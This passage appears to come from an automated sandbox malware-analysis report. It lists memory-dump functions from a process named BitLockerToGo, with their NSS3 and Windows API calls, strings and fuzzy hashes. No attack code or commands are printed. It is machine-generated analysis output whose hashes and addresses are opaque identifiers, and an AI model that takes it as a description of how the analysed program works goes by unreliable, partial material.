                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1923011919-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d6ef1bbae7569d927ab78dd1a983d44b264fc4b8b15339a6e9dca73a4f93b459
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3f1bb3e08b51969067f05ba4c87baa7371a9997d0376b0ca609ffbcabf4c8e85
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6ef1bbae7569d927ab78dd1a983d44b264fc4b8b15339a6e9dca73a4f93b459
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2C185B1D002599FDB21CF25CC40FDAB7B8AF0A308F0085E5E91DA6A51E7319E85CFA5
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000002,?,6C6FCF46,?,6C5CCDBD,?,6C6FBF31,?,?,?,?,?,?,?), ref: 6C5DB039
                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C6FCF46,?,6C5CCDBD,?,6C6FBF31), ref: 6C5DB090
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,6C6FCF46,?,6C5CCDBD,?,6C6FBF31), ref: 6C5DB0A2
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,6C6FCF46,?,6C5CCDBD,?,6C6FBF31,?,?,?,?,?,?,?,?,?), ref: 6C5DB100
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,00000002,?,6C6FCF46,?,6C5CCDBD,?,6C6FBF31,?,?,?,?,?,?,?), ref: 6C5DB115
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,6C6FCF46,?,6C5CCDBD,?,6C6FBF31), ref: 6C5DB12D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C5DC6FD,?,?,?,?,6C62F965,00000000), ref: 6C5C9F0E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C62F965,00000000), ref: 6C5C9F5D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                                                                                                                                                                                                                                                          • String ID: `ul
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3155957115-2372496824
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f37fa78a8e52e5c7b9af66a1433cefe8c7970f13bea44d22f00f68649f6e612b
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f6041cd750b52bc4f6ffc6d8e1eb934f447f6f5e14ef46c1276cb605460a3af3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f37fa78a8e52e5c7b9af66a1433cefe8c7970f13bea44d22f00f68649f6e612b
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4291BAB0A04306CBEB04DF69DC84A6BB7B2BF85308F154A6DE41697A50EB31F840CB56
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_PubDeriveWithKDF.NSS3 ref: 6C670F8D
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C670FB3
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C671006
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?), ref: 6C67101C
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C671033
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C67103F
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C671048
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C67108E
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C6710BB
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C6710D6
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C67112E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C671570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C6708C4,?,?), ref: 6C6715B8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C671570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C6708C4,?,?), ref: 6C6715C1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C671570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C67162E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C671570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C671637
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1510409361-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: aaa37ebe19d98722cfa555772574c901b830a67e21b265247409dddacb83d1c4
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a5d26078c820aaeb473737c873be0fb8f14ad3db5cdc754a4c873e46bf05926b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaa37ebe19d98722cfa555772574c901b830a67e21b265247409dddacb83d1c4
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F971D571E002058FDB14CFA5CC94AAAB7F4BF44318F14892EE90D97711EB71D954CBA9
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C691F19
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C692166
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C69228F
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C6923B8
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C69241C
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memcpy$Error
                                                                                                                                                                                                                                                                                                                                                          • String ID: manufacturer$model$serial$token
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3204416626-1906384322
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3230bd5ae6f2475023d4f639cda0f62ae4ea85a0fd442f7d32e9ebb522b12b79
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e12e2433a315054c501811a7b83d123fc2d91456ee0f6e42c949e4d123c93628
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3230bd5ae6f2475023d4f639cda0f62ae4ea85a0fd442f7d32e9ebb522b12b79
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C70210A2E0CBCD6EF7318671C48C3D77BE49B45328F1C166EC6DE46683C3A859898356
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CCA30: EnterCriticalSection.KERNEL32(?,?,?,6C62F9C9,?,6C62F4DA,6C62F9C9,?,?,6C5F369A), ref: 6C5CCA7A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C5CCB26
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C5D103E
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C5D1139
                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C5D1190
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C5D1227
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C5D126E
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C5D127F
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: Pul$delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2733752649-1063654802
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6ca9c0a9795ebf903b7a824182115097a32ea5185d3499e5b694e7bd93d0d841
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2b5f53b2a8ebaaa94764f5514368ce10ebe3549300149d247abd5c9dd069acb6
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ca9c0a9795ebf903b7a824182115097a32ea5185d3499e5b694e7bd93d0d841
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D71D532705305DBEB049FA9ED89A6F3376FB86334F150639E91287A80DB31E941C796
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C641C6F,00000000,00000004,?,?), ref: 6C696C3F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C641C6F,00000000,00000004,?,?), ref: 6C696C60
                                                                                                                                                                                                                                                                                                                                                          • PR_ExplodeTime.NSS3(00000000,6C641C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C641C6F,00000000,00000004,?,?), ref: 6C696C94
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                                                                                                                                                          • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3534712800-180463219
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c74b622492269008192928048b898fd6a3f8e773805ff2ab6080145ee909f87e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: df068fdfb0824519813807d6cefb481da19cb42408f56cf0ebb0c6be807df8ed
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c74b622492269008192928048b898fd6a3f8e773805ff2ab6080145ee909f87e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A513B72B016494FC708CDADDC526DEBBDAABA4310F48C23AE842DB781D678E906C751
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C711027
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C7110B2
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C711353
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memcpy$strlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2619041689-2155869073
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f651d998669c6fc4f89cb8bd9520dc824735bc1c6d75858c0061e2e7f3616db5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d8b97c4f71e4b435df266a35befc2c7b609102f3fabdf549c02e743239264fdf
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f651d998669c6fc4f89cb8bd9520dc824735bc1c6d75858c0061e2e7f3616db5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30E1BF71A0C3809FD704CF18C980A6BBBF1BF96358F18892DE9958BB51E771E945CB42
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C718FEE
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7190DC
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C719118
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C71915C
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7191C2
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C719209
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                                                          • String ID: 3333$UUUU
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1967222509-2679824526
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b9a212b42e8b9555df1f4bafbdcdef31a2d13868348205a0beaf5b3aec851d09
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1791f80c434d36dcdd8abfed9f9e24d02974e35e96e10df1f87d5196532e5031
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9a212b42e8b9555df1f4bafbdcdef31a2d13868348205a0beaf5b3aec851d09
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14A19E72E001159FDB04CB69CD84B9EB7B5BB88324F0D4179E909A7741E736EC52CBA0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C6ABD48
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C6ABD68
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C6ABD83
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C6ABD9E
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C6ABDB9
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C6ABDD0
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C6ABDEA
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C6ABE04
                                                                                                                                                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C6ABE1E
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: AlgorithmPolicy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2721248240-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a175c4b58da1f134bffc26c90cb93a1b48cbf1230c1501e11e17bd3ca213bccd
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b6b67aa912bece7ec7f3da219675199073d542a42357e8654c273832334def6d
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a175c4b58da1f134bffc26c90cb93a1b48cbf1230c1501e11e17bd3ca213bccd
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D21A5B6E0429D57FB0056D69C43F8B72B4ABD278DF081124F917EE641F7109C1A86EE
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A14E4,6C70CC70), ref: 6C758D47
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C758D98
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C630F00: PR_GetPageSize.NSS3(6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F1B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C630F00: PR_NewLogModule.NSS3(clock,6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F25
                                                                                                                                                                                                                                                                                                                                                          • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C758E7B
                                                                                                                                                                                                                                                                                                                                                          • htons.WSOCK32(?), ref: 6C758EDB
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C758F99
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C75910A
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                                                                                                                                                                                                                                                          • String ID: %u.%u.%u.%u
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1845059423-1542503432
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8977b50aa568d1fa0ad10fd39b28afafc996185fb5de0168ca252f7ddeba26d5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1764383a84e021ea97059b910fa9b5f51331b41bb6248383943734eddc63ed3c
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8977b50aa568d1fa0ad10fd39b28afafc996185fb5de0168ca252f7ddeba26d5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2902F071A062618FDB04CF19C56836ABBB3EF52344F99C26EC8915FB92CB31D916C790
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_GetIdentitiesLayer.NSS3 ref: 6C6D68FC
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C6D6924
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C7090AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C7090C9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: EnterCriticalSection.KERNEL32 ref: 6C7090E5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C709116
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: LeaveCriticalSection.KERNEL32 ref: 6C70913F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C6D693E
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6D6977
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6D69B8
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C6D6B1E
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C6D6B39
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6D6B62
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4003455268-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c45e928cbf5181d022e4387f4e6a14b757206ece0a73ed7348edcc14f48fb2eb
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 307017a75cf517b31afd1ceabd953a32adf4fadb2e99460d438ab1b01d9bb016
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c45e928cbf5181d022e4387f4e6a14b757206ece0a73ed7348edcc14f48fb2eb
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11918374658600CBDB50CF2EC58059E7BB2FB87308B628A69D844CFB29D771F951CB89
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6606A0: TlsGetValue.KERNEL32 ref: 6C6606C2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6606A0: EnterCriticalSection.KERNEL32(?), ref: 6C6606D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6606A0: PR_Unlock.NSS3 ref: 6C6606EB
                                                                                                                                                                                                                                                                                                                                                          • memcmp.VCRUNTIME140(00000000,6C649B8A,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6C649B8A,00000000,k-dl), ref: 6C6609D9
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6C649B8A,00000000,k-dl), ref: 6C6609F2
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C649B8A,00000000,k-dl), ref: 6C660A1C
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C649B8A,00000000,k-dl), ref: 6C660A30
